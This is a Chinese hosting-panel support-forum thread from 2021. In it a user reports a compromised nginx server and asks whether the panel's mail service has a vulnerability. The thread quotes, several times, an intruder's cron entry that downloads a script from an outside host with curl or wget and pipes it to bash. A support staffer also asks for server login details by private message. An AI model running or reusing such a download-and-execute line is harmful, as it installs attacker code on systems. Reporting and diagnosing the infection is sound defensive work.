【待反馈】服务器中毒

30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh

我们的服务器装的nginx ，也开启了nginx防火墙，但是还是会被黑，定时任务中添加了上述内容。
我们安装的应用程度都是通过nginx代理。
其他插件服务安装了宝塔邮局，mysql redis，mysql和redis平时都是内网访问，不暴露。
麻烦查一下邮局这个是否存在安全漏洞。

谢花郎 · 发表于 2021-3-25 15:20:05

您好，如方便的话，私信发我服务器登陆信息。同时我们自己也是在邮局服务的，这个应该不存在漏洞什么的。

宝塔用户_uqkdmc · 发表于 2021-3-25 15:37:40

谢花郎发表于 2021-3-25 15:20
您好，如方便的话，私信发我服务器登陆信息。同时我们自己也是在邮局服务的，这个应该不存在漏洞什么的。 ...

已经发消息给你

谢花郎 · 发表于 2021-3-25 15:41:18

宝塔用户_uqkdmc 发表于 2021-3-25 15:37
已经发消息给你

这个定时任务是你们自行添加的？还是入侵者添加的？

30 23 * * * (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh

宝塔用户_uqkdmc · 发表于 2021-3-25 15:49:51

入侵者添加的

宝塔用户_uqkdmc · 发表于 2021-3-25 15:50:55

/usr/local/usranalyse/logs/log/root/ 这个文件夹下面的日志包含大量内容：curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss

谢花郎 · 发表于 2021-3-25 16:08:10

宝塔用户_uqkdmc 发表于 2021-3-25 15:50
/usr/local/usranalyse/logs/log/root/ 这个文件夹下面的日志包含大量内容：curl -s http://w.apacheorg.t ...

你加一下这个QQ：1249648969，目前确定问题了。你跟他详聊。

█菠萝云买2送1活动！12G内存99元	A2招租，联系qq394030111	APP分发-无行业限制免审核	香港CN2物理机8核32G，398元/月	【UStat】免费易用的网站分析平台
高防服务器，无视一切流量攻击	【阿里云】宝塔一键部署，低至5折	香港站群金牌Gold 6138大促销	【阿里云】宝塔一键部署，低至5折	OV/EV SSL证书，可当日签发
█ 易探云·香港/美国vps仅9元 █	▶CPS云◀海外大带宽vps服务器	OV/EV SSL证书，可当日签发	【云防护】专注域名和网站安全防护	【UStat】免费易用的网站分析平台

【待反馈】服务器中毒

浏览过的版块